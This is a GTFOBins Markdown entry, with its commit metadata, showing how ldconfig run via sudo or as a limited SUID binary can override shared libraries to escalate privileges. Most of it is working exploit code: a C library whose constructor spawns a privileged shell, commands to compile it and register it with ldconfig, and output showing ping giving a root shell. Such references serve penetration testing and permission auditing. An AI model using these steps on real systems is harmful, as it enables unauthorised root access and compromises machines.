GTFOBins.github.io/_gtfobins/ldconfig.md
Andrea Cardaci 391d436fc5 Add ldconfig
Close #68.
2019-08-14 13:14:57 +02:00

55 lines
1.5 KiB
Markdown

---
description: |
Follows a minimal example of how to use the described technique (details may change across different distributions).
Run the code associated with the technique.
Identify a target SUID executable, for example the `libcap` library of `ping`:
```
$ ldd /bin/ping | grep libcap
libcap.so.2 => /tmp/tmp.9qfoUyKaGu/libcap.so.2 (0x00007fc7e9797000)
```
Create a fake library that spawns a shell at bootstrap:
```
echo '#include <unistd.h>
__attribute__((constructor))
static void init() {
execl("/bin/sh", "/bin/sh", "-p", NULL);
}
' >"$TF/lib.c"
```
Compile it with:
```
gcc -fPIC -shared "$TF/lib.c" -o "$TF/libcap.so.2"
```
Run `ldconfig` again as described below then just run `ping` to obtain a root shell:
```
$ ping
# id
uid=1000(user) gid=1000(user) euid=0(root) groups=1000(user)
```
functions:
sudo:
- description: This allows to override one or more shared libraries. Beware though that it is easy to *break* target and other binaries.
code: |
TF=$(mktemp -d)
echo "$TF" > "$TF/conf"
# move malicious libraries in $TF
sudo ldconfig -f "$TF/conf"
limited-suid:
- description: This allows to override one or more shared libraries. Beware though that it is easy to *break* target and other binaries.
code: |
TF=$(mktemp -d)
echo "$TF" > "$TF/conf"
# move malicious libraries in $TF
./ldconfig -f "$TF/conf"
---